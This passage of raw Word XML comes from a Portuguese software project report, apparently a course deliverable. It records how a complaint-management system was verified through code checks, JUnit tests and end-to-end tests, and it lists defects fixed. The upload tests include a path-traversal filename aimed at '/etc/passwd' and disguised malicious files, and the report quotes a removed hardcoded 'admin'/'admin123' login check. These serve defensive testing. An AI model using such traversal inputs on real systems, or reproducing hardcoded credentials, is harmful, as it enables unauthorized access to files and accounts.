      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── backend/                    aplicacao Java (Spring Boot)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── src/main/java/br/gov/protege/    63 classes de producao</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── src/main/resources/              configuracao e carga inicial</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── src/test/java/                   81 testes JUnit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── pom.xml</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── build.cmd, build.ps1             baixam o Maven na 1a execucao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01_ddl_oracle.sql</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── 02_dml_carga.sql</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── 03_consultas.sql</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── diagramas/                  modelo logico e fisico</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── wireframes/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Protege_Mais_Fase5_Documento.docx    documento em Word</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── Protege_Mais_Fase5_Documento.pdf     o mesmo documento em PDF</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── Protege_Mais_Fase5_Apresentacao.pdf  os 10 slides</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── Protege_Mais_Fase5_Apresentacao.html deck navegavel, com o site ao vivo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── README.md                   instrucoes de execucao</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Não integram o pacote: a pasta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(artefatos de compilação), a pasta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">backend/data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(banco H2 gerado em execução) e qualquer arquivo temporário. Todos são recriados automaticamente na primeira execução.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="160"/>
    <w:bookmarkEnd w:id="161"/>
    <w:bookmarkStart w:id="175" w:name="anexo-d-registro-de-verificação"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Anexo D: Registro de verificação</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Este anexo registra como o sistema foi verificado. Ele existe porque a lição central desta fase, descrita na seção 6.2, é que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">teste unitário verde não é sistema funcionando</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: os quatro defeitos mais graves encontrados aqui passariam por qualquer suíte de testes de unidade, porque cada peça, isolada, estava correta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A verificação foi feita em três níveis.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="162" w:name="X18a21bf702d92dd61d0c5b6979435c14dc17f2a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.1 Nível 1: conferência estrutural do código</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de executar qualquer coisa, o código passou por checagens automatizadas de estrutura, que encontram uma classe de defeito que compila e roda mesmo estando errada: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Checagem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procura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Balanceamento de chaves e parênteses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Arquivo truncado ou bloco mal fechado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Pacote declarado contra caminho do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no diretório errado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 da classe pública contra nome do arquivo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Divergência que quebra a compilação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Referências a métodos inexistentes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Chamadas que sobraram de uma refatoração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órfão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Métodos e constantes que ninguém mais chama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Divergência entre</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">data.sql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02_dml_carga.sql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duas cargas precisam descrever a mesma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Simetria das chaves de tradução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 chaves em português e 363 em inglês</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Essa varredura encontrou oito métodos públicos do módulo de integração que nenhuma tela chamava, o que foi o primeiro indício do defeito descrito na seção 3.3.2.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Um registro de honestidade metodológica: a remoção automatizada de código órfão danificou um módulo do front-end durante essa varredura, porque a expressão de busca casou com um trecho maior do que o previsto. O dano foi detectado pela comparação de contagem de linhas contra a versão anterior do repositório, e o arquivo foi restaurado a partir dela. A partir daí, dois órfãos remanescentes foram deliberadamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mantidos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: com um mecanismo de detecção já comprometido uma vez, o risco de mexer passou a ser maior que o ganho de limpar.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="162"/>
    <w:bookmarkStart w:id="163" w:name="d.2-nível-2-testes-automatizados"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.2 Nível 2: testes automatizados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">81 testes JUnit 5, em 11 conjuntos, com zero falhas.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O conteúdo de cada conjunto está na seção 1.9.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Três características desses testes merecem registro:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Eles testam o caminho que precisa funcionar quando o outro falha.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VigiaServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">exercita a classificação por regras, e não a chamada ao modelo do Google, porque é o caminho por regras que sustenta o sistema quando não há chave de API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Eles adulteram de propósito.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AuditoriaServiceTest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">altera o usuário de um registro e remove outro do meio da cadeia, exigindo que o sistema aponte a posição exata e o tipo de inconsistência. É a aplicação prática da recomendação de construir detecção de adulteração no registro (OWASP, [s.d.]b).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Eles carregam a conta feita à mão.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cada um dos 25 testes que cobrem o cálculo estatístico traz, no cabeçalho, o valor esperado e a operação que o produziu, para que uma futura alteração no cálculo precise justificar a divergência em vez de simplesmente atualizar o número esperado.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="163"/>
    <w:bookmarkStart w:id="172" w:name="X731153d795ebffb8626c2aafa3e1eb02980b2ca"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3 Nível 3: bateria de execução ponta a ponta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Executada contra a aplicação em funcionamento, com base recém-carregada, exercitando a API e a interface. Os resultados abaixo foram observados, não presumidos.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="164" w:name="d.3.1-validação-de-entrada"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.1 Validação de entrada</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sete verificações, todas conforme o esperado: descrição abaixo do mínimo, tipo inexistente, UF inválida, campos obrigatórios ausentes e JSON malformado. Em todos os casos a API respondeu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">400</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com o corpo padronizado e o campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">detalhes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mapeando campo para mensagem.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="164"/>
    <w:bookmarkStart w:id="165" w:name="d.3.2-manipulação-de-arquivos"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.2 Manipulação de arquivos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Onze verificações, todas conforme o esperado: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828"/>
        <w:gridCol w:w="40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Cenário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Resposta obtida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Imagem PNG legítima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201, com hash SHA-256 gravado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Executável renomeado para</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.png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SVG com marcação embutida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HTML renomeado para imagem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 ZIP disfarçado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Arquivo de 5 MB mais 10 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Décimo primeiro anexo na mesma denúncia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Recusado, com o limite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Anexo em caso já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</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">../../../etc/passwd.png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Gravado sob UUID; metadado higienizado para</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">passwd.png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por perfil autorizado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200, com registro</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CONSULTA_SENSIVEL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Download com hash divergente do disco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Recusado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os quatro primeiros casos de recusa são a confirmação prática de que a validação olha o conteúdo, e não o rótulo, como prescreve a OWASP ([s.d.]c).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="165"/>
    <w:bookmarkStart w:id="166" w:name="X3ea9c6f63d88bbdaf64bf7f9503dabe60b1630c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.3 A cena que demonstra o controle de acesso</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O mesmo caso, o protocolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#2026-00451</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, aberto por dois perfis em sequência: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86"/>
        <w:gridCol w:w="3564"/>
        <w:gridCol w:w="297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Endereço exibido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Rua Paulista, 100 - Jardim Paulista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[endereco protegido]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Botão de exclusão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disponível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ausente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na trilha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CONSULTA_SENSIVEL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, com hora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CONSULTA_SENSIVEL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, com hora</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As duas leituras aparecem na trilha com carimbo de tempo, o que é a demonstração do item (c) da Parte 5: leitura é acesso, e acesso a dado sensível é registrado.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="166"/>
    <w:bookmarkStart w:id="167" w:name="d.3.4-controle-de-acesso-por-rota"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.4 Controle de acesso por rota</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dez verificações de perfil contra rota, todas conforme a matriz da seção 5.3.1. Os pontos centrais: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/api/auditoria</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolveu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para ATENDENTE e para GESTOR, e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para AUDITOR e ADMIN;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DELETE /api/denuncias/{id}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolveu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para ATENDENTE e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">204</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para GESTOR;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POST /api/equipe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolveu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para ATENDENTE e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">201</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para GESTOR;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GET /api/exportacao/denuncias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">devolveu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para AUDITOR,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com mascaramento para ATENDENTE e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">200</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">com endereço completo para GESTOR;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a comparação fixa que a Fase 4 trazia no JavaScript (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user === 'admin' &amp;&amp; pass === 'admin123'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) foi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">removida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, e o usuário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deixou de existir: o login agora exige o e-mail de uma conta real e é conferido contra o hash BCrypt no servidor.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="167"/>
    <w:bookmarkStart w:id="168" w:name="d.3.5-crud-completo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.5 CRUD completo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Criação pelo portal com o protocolo devolvido pelo servidor aparecendo no Kanban; leitura em lista, em detalhe e pelo canal público; atualização total por</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PUT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; atualização de status por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 com o evento correspondente entrando na linha do tempo; atribuição de responsável; exclusão lógica com o relato lido como vazio depois da operação. Todas as operações de escrita geraram o registro de auditoria correspondente.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="168"/>
    <w:bookmarkStart w:id="169" w:name="d.3.6-estruturas-de-dados"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.6 Estruturas de dados</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Fila de prioridade.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">O topo observado seguiu exatamente a ordem esperada pelo comparador:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICA/88  &gt;  CRITICA/67  &gt;  CRITICA/58  &gt;  CRITICA/51</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">           &gt;  CRITICA/30  &gt;  ALTA/97     &gt;  ALTA/88</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A leitura confirma os critérios em ação: primeiro a urgência, depois o score em ordem decrescente. Um caso de urgência ALTA com score 97 fica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">abaixo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de um caso CRÍTICA com score 30, que é precisamente o comportamento pretendido e discutido na seção 4.2.6.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Pilha.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Duas ações empilhadas, uma desfeita, uma restante. O desfazer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">acrescentou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">um evento à linha do tempo em vez de remover o anterior, resultando na sequência</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">recebida</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">analise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encaminhada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. É a confirmação da decisão descrita na seção 4.1.3.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="169"/>
    <w:bookmarkStart w:id="170" w:name="d.3.7-coerência-do-relatório-estatístico"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.7 Coerência do relatório estatístico</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinco verificações de consistência interna, todas conformes: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94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 das contagens por status igual ao total do universo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Soma do histograma igual ao n de concluídos (76)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Percentis em ordem crescente (p50 menor que p75, menor que p90, menor que p95)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Desvio padrão igual à raiz da variância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Pontos da dispersão sem qualquer campo identificador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Confere</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="170"/>
    <w:bookmarkStart w:id="171" w:name="d.3.8-trilha-de-auditoria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.3.8 Trilha de auditoria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ao final da bateria, a trilha continha as ações exercitadas por ela, com a seguinte distribuição de resultados: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PERMITIDO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A verificação de integridade percorreu a cadeia completa e a reportou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">íntegra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Os seis registros NEGADO são a evidência mais relevante desta seção: eles mostram que as tentativas recusadas foram gravadas, incluindo as bloqueadas por regra de rota, que antes da correção descrita em 5.4.4 não deixavam rastro.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="171"/>
    <w:bookmarkEnd w:id="172"/>
    <w:bookmarkStart w:id="173" w:name="Xa4be0340cd11664c63e6b1b237e58205777055e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.4 Defeitos encontrados e corrigidos durante a verificação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3"/>
        <w:gridCol w:w="2432"/>
        <w:gridCol w:w="2432"/>
        <w:gridCol w:w="2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manifestava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Filtro concedia perfil de gestor a qualquer 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Atendente com poderes de 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Leitura do perfil declarado no token, com queda para o menor privilégio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resolvido no JavaScript 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Credencial fixa no código-fonte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contra o servidor, com BCrypt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 413 e 415 prometidos, código devolvia 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sem informação para reagir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Duas exceções dedicadas e seus tratadores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Recusa por regra de rota não era auditada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 tentativas mais suspeitas não deixavam rastro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Auditoria no ponto em que o 403 é emitido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Mascaramento na exportação era código morto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 perfis que veem tudo podiam exportar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ATENDENTE passou a exportar, com mascaramento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exibia 100 de 126 casos (125 da carga mais uma criada no teste)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pedia 500, servidor limitava a 100 sem avisar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Paginação em laço, com teto de proteção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Sincronização apagava campos só do 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de acompanhamento do anonimato se perdia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Mesclagem preservando a lista de campos locais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Denúncia de emergência desaparecia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Gravava local e era eliminada na sincronização seguinte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Passou pelo caminho da API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Nenhuma tela chamava o método de criação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Denúncia registrada no site nunca chegava ao banco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Origem da US31, seção 3.3.2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Botão de detalhe levava o gestor à tela do cidadão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CONSULTA_SENSIVEL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">nunca disparava pela interface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Ficha do caso própria, origem da US32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Os dez defeitos têm a mesma assinatura:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cada camada estava correta, e a costura entre elas não estava</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. É o argumento a favor de a verificação incluir execução ponta a ponta, e não apenas testes de unidade.</w:t>
      </w:r>
    </w:p>
